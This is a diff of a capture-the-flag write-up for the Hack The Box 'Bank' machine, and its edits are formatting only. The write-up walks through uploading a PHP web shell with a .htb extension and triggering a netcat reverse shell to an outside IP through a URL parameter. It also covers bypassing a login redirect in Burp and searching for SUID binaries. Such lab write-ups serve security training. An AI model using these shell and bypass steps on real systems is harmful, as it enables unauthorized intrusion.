p0i5on8/HTB-Writeups/Bank/readme.md

 ![](images/comment.png)

-uploading php file with .htb extension allows to execute php code
+uploading php file with `.htb` extension allows to execute php code
-after uploading shell.htb we can visit the following URL to get a shell
+after uploading `shell.htb` we can visit the following URL to get a shell
 ```
 http://bank.htb/uploads/shell.htb?c=nc 10.10.14.31 8888 -e /bin/bash
 ```

 ![](images/reverseShell.png)

+# Alternate Way
 ## Improper Redirect
 we can also upload the shell.htb file without having to login as chris because of improper redirect
-/support.php gets redirected to /login.php if we are not logged in but it also gives the content of /support.php before the redirect
+`/support.php` gets redirected to `/login.php` if we are not logged in but it also gives the content of /support.php before the redirect
-so we can still upload the file without login by changing the "302 FOUND" to "200 OK" in burp and then access the uploaded file from /uploads/shell.htb
+so we can still upload the file without login by changing the `302 FOUND` to `200 OK` in burp and then access the uploaded file from `/uploads/shell.htb`
 as curl does not allow redirect by default we can curl /support.php to see that it gives "302 FOUND" but still gives the content

 ![](images/improperRedirect.png)

 # privEsc
-## Method 1 - suid
+## Method 1 - SUID
 found an uncommon suid binary
 ```
 find / -perm -u=s 2>/dev/null